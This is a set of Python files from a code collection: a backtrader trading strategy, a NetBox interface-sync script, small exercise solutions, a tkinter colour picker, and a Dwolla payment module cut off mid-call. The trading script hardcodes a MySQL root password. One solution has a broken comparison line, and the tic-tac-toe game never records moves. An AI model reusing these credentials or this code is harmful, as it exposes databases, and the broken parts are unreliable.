mydata.open[-3]\n\t\t\tand mydata.open[-1] > mydata.open[-2]\n\t\t\tand mydata.open[0] > mydata.open[-1]\n\t\t\tand mydata.open[0] >= 
mydata.close[-1]\n\t\t\tand mydata.close[0] < mydata.open[-3]\n\t\t\t):\n\t\t\tsignal = True\n\t\telse:\n\t\t\tsignal = False\n\t\treturn signal\n\t\t\t\n\tdata_live = False\n\tdef notify_data(self, data, status):\n\t\t#To notify us when delayed backfilled data becomes live data during live trading\n\t\tprint('*' * 5, 'DATA NOTIF:', data._getstatusname(status))\n\t\tif status == data.LIVE:\n\t\t\tself.data_live = True\n\t\t\tself.datastatus = 1\t\n\t\t\t\t\t\t\n\tdef log(self, txt, dt=None):\n\t\t''' Logging function for this strategy'''\n\t\tdt = self.datetime.date()\n\t\tmystring = ' {},{}'.format(dt.isoformat(), txt)\n\t\treturn mystring\n\t\t\n#********************************************RUN STRATEGY*******************************************************\t\ndef runstrat():\n\t\n\t#Create an instance of cerebro\n\tcerebro = bt.Cerebro(exactbars=-1) #exactbars True reduces memory usage significantly, but change to '-1' for partial memory savings (keeping indicators in memory) or 'false' to turn off completely if having trouble accessing bars beyond max indicator parameters. \n\tcerebro.broker.set_coc(False) #cheat on close allows you to buy the close price of the current bar in which the order was made\n\tcerebro.broker.set_coo(False) #cheat on open allows you to simulate a market order on the open price of the next bar\n\t\n\t#Add our strategy\n\tcerebro.addstrategy(Strategy)\n\t\n\t#Create/Instantiate objects to access parameters from UserInput Class\n\t#Can NOT create object referencing Strategy class as per backtrader\n\tmodelp = UserInputs.model_params()\n\tindp = UserInputs.ind_params()\n\tdatalist = UserInputs.datalist('hist')\n\tibdatalist = UserInputs.datalist('ib')\n\t\n\t#Ensure stock lists have no duplicates - duplicates will BREAK program\n\tif len(datalist) != len(set(datalist)) or len(ibdatalist) != len(set(ibdatalist)):\n\t\tprint(\"*****You have duplicates in stock list - FIX LIST*****\")\n\t\n\t#GET THE DATA\n\tsession_start = modelp.get('sessionstart')\n\tsession_end = modelp.get('sessionend')\t\n\t\n\tif modelp.get('live_status'):\n\t\t#***** LIVE TRADING PARAMETERS*******\n\t\tstore = bt.stores.IBStore(host='127.0.0.1',\n\t\t\t\t\t\t\t\tport=7497,\n\t\t\t\t\t\t\t\tclientId = 100)\n\t\t\n\t\t#get number of tickers\n\t\tticker_count = len(ibdatalist)\n\t\t\n\t\tindicator_dict = UserInputs.ind_params()\n\t\tmax_ind = max(indicator_dict.values()) \n\t\t\t\t\t\t\t\n\t\t#Data set for live trading IB\n\t\tfor i,j in enumerate(ibdatalist):\n\t\t\t\n\t\t\t#Data for live IB trading\n\t\t\tdata = store.getdata(dataname=j,\n\t\t\t\t\t\t\t\ttimeframe=bt.TimeFrame.Minutes,\n\t\t\t\t\t\t\t\ttz = pytz.timezone('US/Central'),\n\t\t\t\t\t\t\t\t#historical = True, \n\t\t\t\t\t\t\t\tbackfill_start = True, #true enables maximum allowable backfill in single request\n\t\t\t\t\t\t\t\tuseRTH = True, \n\t\t\t\t\t\t\t\trtbar=True,\n\t\t\t\t\t\t\t\tfromdate = UserInputs.ib_backfill_start(UserInputs.max_ind()),#from date determined by today - max period parameter \n\t\t\t\t\t\t\t\tsessionstart = session_start,\n\t\t\t\t\t\t\t\tsessionend = session_end,\n\t\t\t\t\t\t\t\tnotifyall=True,\n\t\t\t\t\t\t\t\tqcheck=2.0,\n\t\t\t\t\t\t\t\tdebug=True)\n\t\t\t\n\t\t\tcerebro.resampledata(data, name=\"{}0\".format(j),timeframe=bt.TimeFrame.Minutes, compression=modelp.get('base_timeframe'))\n\t\t\t\n\t\t\t#Apply resamplings\n\t\t\tif 
modelp.get('timeframe1on'):\n\t\t\t\tdata_Timeframe1 = cerebro.resampledata(data,name=\"{}1\".format(j),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttimeframe=bt.TimeFrame.Minutes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tcompression = modelp.get('timeframe1'))\n\t\t\t\n\t\t\tif modelp.get('timeframe2on'):\n\t\t\t\tdata_Timeframe2 = cerebro.resampledata(data,name=\"{}2\".format(j),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttimeframe=bt.TimeFrame.Minutes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tcompression = modelp.get('timeframe2'))\n\t\t\t\t\t\t\t\t\t\t\n\t\t#Assign the IB broker once, after all live data feeds are added\n\t\tcerebro.broker = store.getbroker()\n\t\t\n\telif not modelp.get('live_status'):\n\t\t#******BACKTESTING ONLY - MYSQL DATABASE*********\n\t\t\n\t\t#get number of tickers\n\t\tticker_count = len(datalist)\n\t\n\t\t#mysql configuration items for connection\n\t\thost = '127.0.0.1'\n\t\tuser = 'root'\n\t\tpassword = 'EptL@Rl!1'\n\t\tdatabase = 'Stock_Prices'\n\t\ttable = '5_min_prices'\n\t\t\n\t\t#Determine data range to run\n\t\tstart_date = modelp.get('start_date')\n\t\tend_date = modelp.get('end_date')\n\t\n\t\tfor i,j in enumerate(datalist):\n\t\t\t#Get data from mysql and add data to Cerebro\n\t\t\tdata = mysql.MySQLData(dbHost = host,\n\t\t\t\t\t\t\t\t\tdbUser = user,\n\t\t\t\t\t\t\t\t\tdbPWD = password,\n\t\t\t\t\t\t\t\t\tdbName = database,\n\t\t\t\t\t\t\t\t\ttable = table,\n\t\t\t\t\t\t\t\t\tsymbol = j,\n\t\t\t\t\t\t\t\t\tfromdate = start_date,\n\t\t\t\t\t\t\t\t\ttodate= end_date,\n\t\t\t\t\t\t\t\t\tsessionstart = session_start,\n\t\t\t\t\t\t\t\t\tsessionend = session_end,\n\t\t\t\t\t\t\t\t\ttimeframe=bt.TimeFrame.Minutes,\n\t\t\t\t\t\t\t\t\tcompression = modelp.get('base_timeframe'),\n\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\t\n\t\t\tdata_BaseTimeframe = cerebro.adddata(data=data, \n\t\t\t\t\t\t\t\t\t\t\t\tname=\"{}0\".format(j),\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\tdata_BaseTimeframe.csv=True #Report this data to csv file (true) or not (false)\t\n\t\t\tdata_BaseTimeframe.plotinfo.plot = True\n\t\t\t\n\t\t\tif modelp.get('timeframe1on'):\n\t\t\t\t#Apply resamplings\t\t\t\n\t\t\t\tdata_Timeframe1 = cerebro.resampledata(data,\n\t\t\t\t\t\t\t\t\t\tname=\"{}1\".format(j),\n\t\t\t\t\t\t\t\t\t\ttimeframe=bt.TimeFrame.Minutes,\n\t\t\t\t\t\t\t\t\t\tcompression = modelp.get('timeframe1'),\n\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\tdata_Timeframe1.csv=False #Report this data to csv file (true) or not (false)\t\t\t\t\n\t\t\t\tdata_Timeframe1.plotinfo.plot = True\n\t\t\t\t#data_Timeframe1.plotinfo.plotmaster = data_BaseTimeframe\n\t\n\t\t\tif modelp.get('timeframe2on'):\n\t\t\t\tdata_Timeframe2 = cerebro.resampledata(data,\n\t\t\t\t\t\t\t\t\t\tname=\"{}2\".format(j),\n\t\t\t\t\t\t\t\t\t\ttimeframe=bt.TimeFrame.Minutes,\n\t\t\t\t\t\t\t\t\t\tcompression = modelp.get('timeframe2'),\n\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\tdata_Timeframe2.csv=False #Report this data to csv file (true) or not (false)\t\n\t\t\t\tdata_Timeframe2.plotinfo.plot = True\n\t\t\t\t#data_Timeframe2.plotinfo.plotmaster = data_BaseTimeframe\n\t\t\t\n\t\t# Set our desired cash start\n\t\tcerebro.broker.setcash(modelp.get('start_cash'))\n\t\t\n\t\t# Set the commission\n\t\tcerebro.broker.setcommission(commission=0.00003,\n\t\t\t\t\t\t\t\t\tmargin= None,\n\t\t\t\t\t\t\t\t\tmult=1.0,\n\t\t\t\t\t\t\t\t\tcommtype=None,\n\t\t\t\t\t\t\t\t\tpercabs=True,\n\t\t\t\t\t\t\t\t\tstocklike=True,\n\t\t\t\t\t\t\t\t\tleverage=1)\n\t\t\n\t\t\"\"\"\n\t\t#Set the slippage\n\t\tcerebro.broker.set_slippage_perc(0.001,\n\t\t\t\t\t\t\t\t\t\tslip_open=True, 
\n\t\t\t\t\t\t\t\t\t\tslip_limit=True,\n\t\t\t\t\t\t\t\t\t\tslip_match=True,\n\t\t\t\t\t\t\t\t\t\tslip_out=False)\n\t\t\"\"\"\n\t\t\n\t# Add SQN to qualify the trades (rating to analyze quality of trading system: 2.5-3 good, above 3 excellent. SquareRoot(NumberTrades) * Average(TradesProfit) / StdDev(TradesProfit). Need at least 30 trades to be reliable\n\tcerebro.addanalyzer(bt.analyzers.SQN)\n\t\n\t#Adding my own custom analyzer - when creating analyzer, make sure to include file in __init__.py within backtrader.analyzer folder so it runs\n\tcerebro.addanalyzer(bt.analyzers.AcctStats)\n\t\n\t#Adding analyzer for drawdown\n\tcerebro.addanalyzer(bt.analyzers.DrawDown)\n\t\n\t# Add Transactions analyzer to output trade statistics\n\tcerebro.addanalyzer(bt.analyzers.Transactions)\n\t\n\t#Adds just buy/sell observer to chart (assuming stdstats is set to false)\n\tcerebro.addobservermulti(bt.observers.BuySell)\n\t\n\t#Adds custom observers\n\tcerebro.addobserver(bt.observers.AcctValue) #reports trade statistics in command prompt at end of program run\n\tcerebro.addobserver(bt.observers.OrderObserver) #reports trades in command prompt when program is run\n\t\n\t#Generate output report in csv format\n\tif UserInputs.model_params().get('writer')=='on':\n\t\tcurrent_time = datetime.now().strftime(\"%Y-%m-%d_%H.%M.%S.csv\") \n\t\tcsv_file = 'C:/Program Files (x86)/Python36-32/Lib/site-packages/backtrader/out/'\n\t\tcsv_file += 'Strategy'\n\t\tcsv_file += current_time\n\t\tcerebro.addwriter(bt.WriterFile, csv = True, out=csv_file)\n\t\tprint(\"Writer CSV Report On\")\n\n\t\n\t#RUN EVERYTHING\n\tresults = cerebro.run(stdstats=False, #stdstats True enables extra chart information like profit/loss and buy/sell markers, but tends to clutter the chart\n\t\t\t\t\t\trunonce=False,\n\t\t\t\t\t\t)\n\t\n\tstrats = results[0]\n\t\t\n\tif not modelp.get('live_status'):\n\t\n\t\t#Print analyzers\n\t\tfor alyzer in strats.analyzers:\n\t\t\talyzer.print()\n\t\t\n\t\t#Calculate Program end time\n\t\tend_time = datetime.now().time()\n\t\tprint('Program end at {}'.format(end_time))\n\t\t\n\t\t#Chart all timeframes, one by one\n\t\tfor i in range (len(strats.datas)):\n\t\t\tfor j, d in enumerate(strats.datas):\n\t\t\t\td.plotinfo.plot = i ==j\n\t\t\tcerebro.plot(volume = True, style='candlestick',barup='olive', bardown='lightpink',volup = 'lightgreen',voldown='crimson')\n\t\t\n\t\t#Only chart 5 minute graphs, one by one\n\t\t\"\"\"\n\t\tfor i in range (0,len(strats.datas),data_feed_count):\n\t\t\tfor j, d in enumerate(strats.datas):\n\t\t\t\td.plotinfo.plot = i ==j\t\n\t\t\tcerebro.plot(style='candlestick',barup='olive', bardown='lightpink',volup = 'lightgreen',voldown='crimson')\n\t\t\"\"\"\n\nif __name__ == '__main__':\n\t\n\t#Run strategy\n\trunstrat()\n","sub_path":"myscripts/Trading Package/archive_trading model/Working Trading Modelv52.py","file_name":"Working Trading Modelv52.py","file_ext":"py","file_size_in_byte":51879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
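The sizing routine in the strategy record above caps the share count two ways: a volatility cap (dollars risked per trade spread over a stop placed an ATR multiple away) and a capital cap (maximum notional per trade). A minimal standalone sketch of that rule; the parameter names mirror the strategy's inputs, everything else is an assumption:

def position_size(price, atr, atrdist, dollars_risked_trade, total_dollars_risked):
    # Volatility cap: risk dollars_risked_trade against a stop atrdist ATRs away.
    atrsize = dollars_risked_trade / (atr * atrdist)
    # Capital cap: never buy more notional than total_dollars_risked.
    maxsize = total_dollars_risked / price
    # IB only accepts whole shares, so truncate to an integer.
    return int(min(atrsize, maxsize))

assert position_size(price=50.0, atr=1.0, atrdist=2.0,
                     dollars_risked_trade=200.0, total_dollars_risked=10000.0) == 100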
+{"seq_id":"351329507","text":"def solution(N, stages):\n answer = []\n stages.sort()\n fail=list()\n index=list()\n for i in range(N):\n if i+1 in stages:\n fail.append(stages.count(i+1)/len(stages[stages.index(i+1):]))\n elif i+1 0:\n location=fail.index(max(fail))\n answer.append(index[location])\n index.pop(location)\n fail.pop(location)\n \n return answer\n","sub_path":"Programmers/Level_1/[2019 KAKO BLIND RECRUITMENT] 실패율.py","file_name":"[2019 KAKO BLIND RECRUITMENT] 실패율.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"18265302","text":"import re\n\nfrom django.http import QueryDict\n\nfrom dcim.api.views import DeviceViewSet\nfrom dcim.choices import InterfaceTypeChoices\nfrom dcim.models import Device, Interface\nfrom extras.scripts import Script, StringVar\n\n\n# TODO: See if this NAPALM call through Netbox can be improved upon without handling NAPALM ourselves\n# or calling the Netbox API via HTTP\ndef napalm_call(method: str, device_id: int, request):\n \"\"\"Function to make NAPALM calls to devices through Netbox internal code\n\n Args:\n method (str): the NAPALM method to call (only supports 'get' methods due to Netbox limitation)\n device_id (int): the id of the device to execute the NAPALM method on\n request: a :obj:`django.http.HttpRequest` or a :obj:`utilities.utils.NetboxFakeRequest` obtained from a script's run method\n\n Returns:\n dict: Returns a dict with the results returned by NAPALM\n \"\"\"\n deviceviewset = DeviceViewSet()\n # Only filter out current device, so we don't prefetch entire database\n deviceviewset.queryset = Device.objects.filter(id=device_id).prefetch_related(\n \"platform\",\n \"primary_ip4__nat_outside\",\n \"primary_ip6__nat_outside\",\n )\n\n request.headers = []\n request.GET = QueryDict(f\"method={method}\")\n response = deviceviewset.napalm(request, device_id)\n return response.data[method]\n\n\nclass InterfaceUpdate(Script):\n \"\"\"Script that can be used to auto generate interfaces from devices using NAPALM\n\n Args:\n Script (:obj:`extras.script.Script`): Netbox Script object that is needed for a class to be recognized as one\n \"\"\"\n\n class Meta:\n \"\"\"Special class that is used for defining script information\"\"\"\n\n name = \"Interface update\"\n description = \"Script that updates interfaces for device names provided\"\n commit_default = False\n\n device_name = StringVar(\n label=\"Devices regex\",\n default=\"(r6|v22)-leaf((1\\d*|[2-9])|1)\",\n description=\"Regex that will be used to select devices to update interfaces\",\n )\n ignore_interfaces = StringVar(\n label=\"Interfaces to ignore regex\",\n default=\"Vlan.*\",\n description=\"Regex that will ignore interfaces matching it (Leave blank to not ignore any)\",\n )\n\n def run(self, data, commit: bool):\n \"\"\"The main method of the script that will be run when pressing the Run Script button\n\n 1. Grabs the data from Netbox about devices containing the devices by regex input by the user\n 2. Loops through the devices, grabs their current Netbox interfaces and then makes a NAPALM call to the device\n 3. Loops through NAPALM interfaces, while ignoring the ones matching the user supplied regex\n 4. If a mac_address is any kind of empty or null, it makes sure to set it to python None\n 5. Using get_or_create, grabs or creates the interface from Netbox while filtering by the specific NAPALM interface the loop is currently on\n 6. Notifies user if a interface was created and if it wasn't checks if the description in Netbox matches NAPALM description\n 7. Updates description if neccessary, notifying user of it.\n\n Args:\n data (dict): a dict that has the variables for user input. 
Defined using class variables\n commit (bool): a bool that determines to commit or not to commit the changes to database\n (since Netbox automatically reverts database changes on commit = False, we don't use it)\n\n Returns:\n str: output for the Output tab\n \"\"\"\n output = \"\"\n devices = Device.objects.filter(name__regex=data[\"device_name\"])\n\n for device in devices:\n netbox_interfaces = Interface.objects.filter(device=device.id)\n napalm_interfaces = napalm_call(\"get_interfaces\", device.id, self.request)\n\n for napalm_interface in napalm_interfaces:\n # Blacklist interfaces\n if data[\"ignore_interfaces\"] != \"\" and re.match(\n data[\"ignore_interfaces\"], napalm_interface\n ):\n continue\n\n napalm_description = napalm_interfaces[napalm_interface][\"description\"]\n\n mac_address = napalm_interfaces[napalm_interface][\"mac_address\"]\n if (\n mac_address == \"None\"\n or mac_address == \"Unspecified\"\n or mac_address == \"\"\n ):\n mac_address = None\n\n # We don't use update_or_create so we can inform the user when something actually updates\n # update_or_create will update even if nothing changes\n (netbox_interface, created) = netbox_interfaces.get_or_create(\n name=napalm_interface,\n defaults={\n \"type\": InterfaceTypeChoices.TYPE_OTHER,\n \"description\": napalm_description,\n \"device\": device,\n \"mac_address\": mac_address,\n },\n )\n if created:\n self.log_success(\n f\"`[{device.name}]` Created a new interface **({netbox_interface.name})**\"\n )\n else:\n if netbox_interface.description != napalm_description:\n old_description = netbox_interface.description\n netbox_interface.description = napalm_description\n netbox_interface.save()\n self.log_success(\n f\"`[{device.name}]` Updated an interface's description **({netbox_interface.name})**: '{old_description}' -> '{napalm_description}'\"\n )\n\n return output\n","sub_path":"scripts/interface_update.py","file_name":"interface_update.py","file_ext":"py","file_size_in_byte":5836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
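The get-or-create-then-compare pattern in the script above is what makes re-runs idempotent and lets it log only real changes. The same pattern stripped of Django, over plain dicts; all names here are hypothetical:

def sync_descriptions(netbox_ifaces, napalm_ifaces):
    """Return (created, updated) interface names; netbox_ifaces is mutated in place."""
    created, updated = [], []
    for name, live in napalm_ifaces.items():
        existing = netbox_ifaces.get(name)
        if existing is None:
            # Not known yet: create it with the live description.
            netbox_ifaces[name] = {"description": live["description"]}
            created.append(name)
        elif existing["description"] != live["description"]:
            # Known but stale: update and report, so no-op runs stay silent.
            existing["description"] = live["description"]
            updated.append(name)
    return created, updated

nb = {"eth0": {"description": "old"}}
live = {"eth0": {"description": "uplink"}, "eth1": {"description": ""}}
assert sync_descriptions(nb, live) == (["eth1"], ["eth0"])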
+{"seq_id":"561986800","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 27 22:46:36 2014\n\n@author: DiCar\n\"\"\"\n\ndef word_count(phrase):\n dictionary = {}\n \n words = phrase.split()\n for word in words:\n dictionary[word] = words.count(word)\n return dictionary\n \n","sub_path":"all_data/exercism_data/python/word-count/c8060492d1b14c4b9e5a270a8f5ee84f.py","file_name":"c8060492d1b14c4b9e5a270a8f5ee84f.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"87155585","text":"import datetime\nfrom django.utils import timezone\nfrom .models import Reservation\nfrom rest_framework import serializers\n\n\nclass ReservationSerializer(serializers.ModelSerializer):\n team = serializers.SerializerMethodField()\n\n def get_team(self, obj):\n try:\n user = obj.proposer\n except AttributeError:\n user = obj[\"proposer\"]\n return user.get_team_name()\n\n def validate_proposer(self, value):\n user = self.context[\"request\"].user\n if value.position == 1 or user != value:\n raise serializers.ValidationError({\"error\": \"회의실 예약 권한이 없습니다.\"})\n return value\n\n def create(self, validated_data):\n # 회의실 예약은 반드시 미래의 시간에 대해서만 가능하다.\n date = validated_data[\"date\"]\n start_time = validated_data[\"start_time\"]\n hour, minute = divmod(start_time, 2)\n minute *= 30\n d_datetime = timezone.datetime.combine(\n date,\n datetime.time(hour, minute),\n tzinfo=timezone.timezone(timezone.timedelta(hours=9)),\n )\n if d_datetime < timezone.localtime():\n raise serializers.ValidationError(\n {\"error\": f\"{d_datetime}은 예약이 불가능한 시간입니다.\"}\n )\n\n # super().create()에서 reservation을 생성하고 return 한다.\n return super().create(validated_data)\n\n def update(self, request, pk=None):\n pass\n\n class Meta:\n model = Reservation\n fields = (\"id\", \"room\", \"date\", \"start_time\", \"proposer\", \"team\")\n read_only_fields = (\"id\",)\n","sub_path":"conference/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"513479393","text":"#! /usr/local/bin/python3\n\nimport os\n\ndef newline(): print(\"\")\n\ndef main():\n\n\n\tnewline()\n\tprint(\"Welcome to Tic Tac Toe!\")\n\tnewline()\n\tprint(\"Who will play first?\")\n\tplayer_one = input(\"Please type Player 1's name: \")\n\tnewline()\n\tprint(\"Who will play second?\")\n\tplayer_two = input(\"Please type Player 2's name: \")\n\tnewline()\n\tnewline()\n\tnewline()\n\tprint(\"Presenting: \")\n\tnewline()\n\tprint(\"\\t%s v %s\" % (player_one,player_two))\n\n\tour_game = game(player_one,player_two)\n\n\t# our_game = game(\"j\",\"k\")\n\n\tgame.instructions(our_game)\n\n\tnewline()\n\tos.system('read -p \"Press any key to continue.\"')\n\tnewline()\n\n\tturn_count = game.get_turn_count(our_game)\n\n\twhile (turn_count < 16):\n\t\tgame.print_board(our_game)\n\t\tgame.turn(our_game)\n\t\tturn_count = game.get_turn_count(our_game)\n\n\treturn 0\n\nclass game:\n\t\"\"\"An instance of a tic-tac-toe game\"\"\"\n\n\tdef __init__(self,player_one, player_two):\n\t\tself._player_one = player_one\n\t\tself._player_two = player_two\n\t\tself._game_board = [[' ',' ',' ',' '],[' ',' ',' ',' '],[' ',' ',' ',' '],[' ',' ',' ',' ']]\n\t\tself._count = 0\n\t\tself._user_row = 0\n\t\tself._user_col = 0\n\n\tdef instructions(self):\n\n\t\tnewline()\n\t\tprint(\"How to Play:\")\n\t\tprint(\"When prompted, enter your move as \\\"row column\\\".\")\n\t\tprint(\"For Example, to play here:\")\n\n\t\tprint(\"\\t 1 2 3 4 \")\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t1 | | | | |\")\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t1 | | | x | |\")\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t1 | | | | |\")\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t1 | | | | |\")\n\t\tprint(\"\\t +---+---+---+---+\")\n\n\t\tprint(\"Enter: 2 3\");\n\t\tnewline()\n\t\tnewline()\n\n\tdef print_board(self):\n\t\tprint(\"\\t 1 2 3 4 \")\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t1 | %s | %s | %s | %s |\" % (self._game_board[0][0],self._game_board[0][1],self._game_board[0][2],self._game_board[0][3]))\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t2 | %s | %s | %s | %s |\" % (self._game_board[1][0],self._game_board[1][1],self._game_board[1][2],self._game_board[1][3]))\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t3 | %s | %s | %s | %s |\" % (self._game_board[2][0],self._game_board[2][1],self._game_board[2][2],self._game_board[2][3]))\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\tprint(\"\\t4 | %s | %s | %s | %s |\" % (self._game_board[3][0],self._game_board[3][1],self._game_board[3][2],self._game_board[3][3]))\n\t\tprint(\"\\t +---+---+---+---+\")\n\t\treturn\n\n\tdef get_turn_count(self):\n\t\treturn self._count\n\n\tdef turn(self):\n\t\tnewline()\n\t\tnewline()\n\t\tif (self._count % 2 == 0): current_player = self._player_one\n\t\telse: current_player = self._player_two\n\t\tprint(\"Your move, %s\" % current_player)\t\t\n\t\tnewline()\n\t\twhile(True):\n\t\t\traw_input = input(\"%s, please enter your move as \\\"row column\\\": \" % current_player)\n\t\t\tif ((raw_input[0].isdigit() == True) and (int(raw_input[0]) > 0) and (int(raw_input[0])<5)):\n\t\t\t\tself._user_row = int(raw_input[0])-1\n\t\t\telse:\n\t\t\t\tprint(\"Invalid move.\")\n\t\t\tif ((raw_input[2].isdigit() == True) and (int(raw_input[2]) > 0) and (int(raw_input[2])<5)):\n\t\t\t\tself._user_col = int(raw_input[2])-1\n\t\t\telse:\n\t\t\t\tprint(\"Invalid move.\")\n\t\t\tif (self._game_board[self._user_row][self._user_col]==' '):\n\t\t\t\tif(self._count % 2 == 
0):\n\t\t\t\t\tself._game_board[self._user_row][self._user_col]=='x'\n\t\t\t\t\tself._count += 1\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tself._game_board[self._user_row][self._user_col]=='o'\n\t\t\t\t\tself._count += 1\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"Invalid move.\")\n\n\n\n\tdef check_for_win(ary, piece, winner, player):\n\t\treturn\n\n\tdef update_board(move):\n\t\treturn\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"advanced_data_structures/py/06-tic-tac-toe.py","file_name":"06-tic-tac-toe.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
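`check_for_win` in the game above is left as a stub. One way it could be filled in for the 4x4 board layout the class uses (rows, columns, and both diagonals); this is a sketch independent of the game class, not the author's implementation:

def check_for_win(board, piece):
    # board is the 4x4 list of lists used by the game; piece is 'x' or 'o'.
    lines = []
    lines.extend(board)                                                 # rows
    lines.extend([[board[r][c] for r in range(4)] for c in range(4)])   # columns
    lines.append([board[i][i] for i in range(4)])                       # main diagonal
    lines.append([board[i][3 - i] for i in range(4)])                   # anti-diagonal
    return any(all(cell == piece for cell in line) for line in lines)

board = [['x', 'x', 'x', 'x'],
         [' ', 'o', ' ', ' '],
         ['o', ' ', ' ', ' '],
         [' ', ' ', 'o', ' ']]
assert check_for_win(board, 'x') and not check_for_win(board, 'o')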
+{"seq_id":"40305586","text":"from tkinter import *\r\n\r\nroot = Tk() #Root window application\r\nroot.geometry('600x350')\r\nroot.resizable(0,0)\r\nroot.title('X Y Z Color Controller')\r\n\r\nX = IntVar() # X,Y,Z for RGB and BG string var to change\r\nY = IntVar() # Right Frame's colour\r\nZ = IntVar()\r\nbg = StringVar()\r\n\r\nleftframe = Frame(root,height=350,width=300,bg='#FFFFFF') # Control Frame\r\nleftframe.pack(side=LEFT)\r\n\r\nrightframe = Frame(root,height=350,width=300,bg='#000000') # Color Frame\r\nrightframe.pack(side=RIGHT)\r\n\r\ndef control(event): # Control X and Y Sliders\r\n x = event.x\r\n y = event.y\r\n\r\n X.set(x*1.275)\r\n Y.set(y*1.275)\r\n\r\n show(event)\r\n\r\ndef getHex(var): # Get Hex code in the format\r\n hex_code = var.split('x')[1] # '#RRGGBB'\r\n if len(hex_code) == 1:\r\n return '0' + hex_code\r\n else:\r\n return hex_code\r\n\r\ndef show(event): # This method sets BG\r\n R = getHex(hex(X.get()))\r\n G = getHex(hex(Y.get()))\r\n B = getHex(hex(Z.get()))\r\n bg.set('#' + R + G + B)\r\n rightframe.config(bg=bg.get())\r\n color_label.config(text=bg.get())\r\n\r\n# Rectangular control area\r\nrect = Canvas(leftframe,height=200,width=200,bg='#000000',cursor='circle')\r\nrect.place(x=25,y=25)\r\nrect.bind('',control)\r\nrect.bind('',control)\r\n\r\n# X_Slider\r\nx_slider = Scale(leftframe,orient=HORIZONTAL,showvalue=0,length=200,variable=X,from_=0,to_=255)\r\nx_slider.place(x=25,y=260)\r\nx_slider.bind('',show)\r\nx_slider.bind('',show)\r\n\r\n# Y_Slider\r\ny_slider = Scale(leftframe,orient=VERTICAL,showvalue=0,length=200,variable=Y,from_=0,to_=255)\r\ny_slider.place(x=250,y=25)\r\ny_slider.bind('',show)\r\ny_slider.bind('',show)\r\n\r\n# Z_Slider\r\nz_slider = Scale(leftframe,orient=HORIZONTAL,showvalue=0,length=200,variable=Z,from_=0,to_=255)\r\nz_slider.place(x=25,y=300)\r\nz_slider.bind('',show)\r\nz_slider.bind('',show)\r\n\r\n# Color Hex code\r\ncolor_label = Label(leftframe,font='calibri 20 bold',fg='#000000',bg='#FFFFFF')\r\ncolor_label.place(x=75,y=320)\r\n\r\nroot.mainloop()\r\n","sub_path":"xyzcontroller.py","file_name":"xyzcontroller.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"619034853","text":"\"\"\"\nModule containing function load_windows that loads one of the spreadsheets\n'ARR_VS_ARR, DEP_VS_ARR, ARR_VS_DEP or DEP_VS_DEP'.\n\"\"\"\nimport csv\n\ndef load_windows(filename):\n \"\"\"\n Function that reads spreadsheet filename where the rows have the structure\n train, delayer, delayer, delayer, ...\n And returns spreadsheet as dictionary that has trains as keys\n with list [delayer, delayer, delayer, ...] as values.\n \"\"\"\n csv_reader = csv.reader(open(filename), delimiter=',')\n windows = {}\n\n #Load datastructure to dictionary\n firstrow = True\n for row in csv_reader:\n if firstrow:\n firstrow = False\n else:\n windows[row[0]] = row[1:]\n return windows\n\n","sub_path":"ver4/load_windows.py","file_name":"load_windows.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"453701956","text":"from dwolla import transactions, fundingsources\n\nfrom brambling.payment.core import InvalidAmountException, get_fee\nfrom brambling.payment.dwolla.core import dwolla_prep\n\n\ndef dwolla_get_sources(account, event):\n if account.api_type != event.api_type:\n raise ValueError(\"Account and event API types do not match.\")\n org_account = event.organization.get_dwolla_account(event.api_type)\n if not org_account or not org_account.is_connected():\n raise ValueError(\"Event is not connected to dwolla.\")\n dwolla_prep(account.api_type)\n access_token = account.get_token()\n destination = org_account.user_id\n return fundingsources.get(\n alternate_token=access_token,\n params={\n 'destinationid': destination,\n 'verified': True\n }\n )\n\n\ndef dwolla_charge(account, amount, order, event, pin, source):\n \"\"\"\n Charges to dwolla and returns a charge transaction.\n \"\"\"\n if amount < 0:\n raise InvalidAmountException('Cannot charge an amount less than zero.')\n if account.api_type != event.api_type:\n raise ValueError(\"Account and event API types do not match.\")\n org_account = event.organization.get_dwolla_account(event.api_type)\n if not org_account or not org_account.is_connected():\n raise ValueError(\"Event is not connected to dwolla.\")\n dwolla_prep(account.api_type)\n access_token = account.get_token()\n organization_access_token = org_account.get_token()\n destination = org_account.user_id\n\n user_charge_id = transactions.send(\n 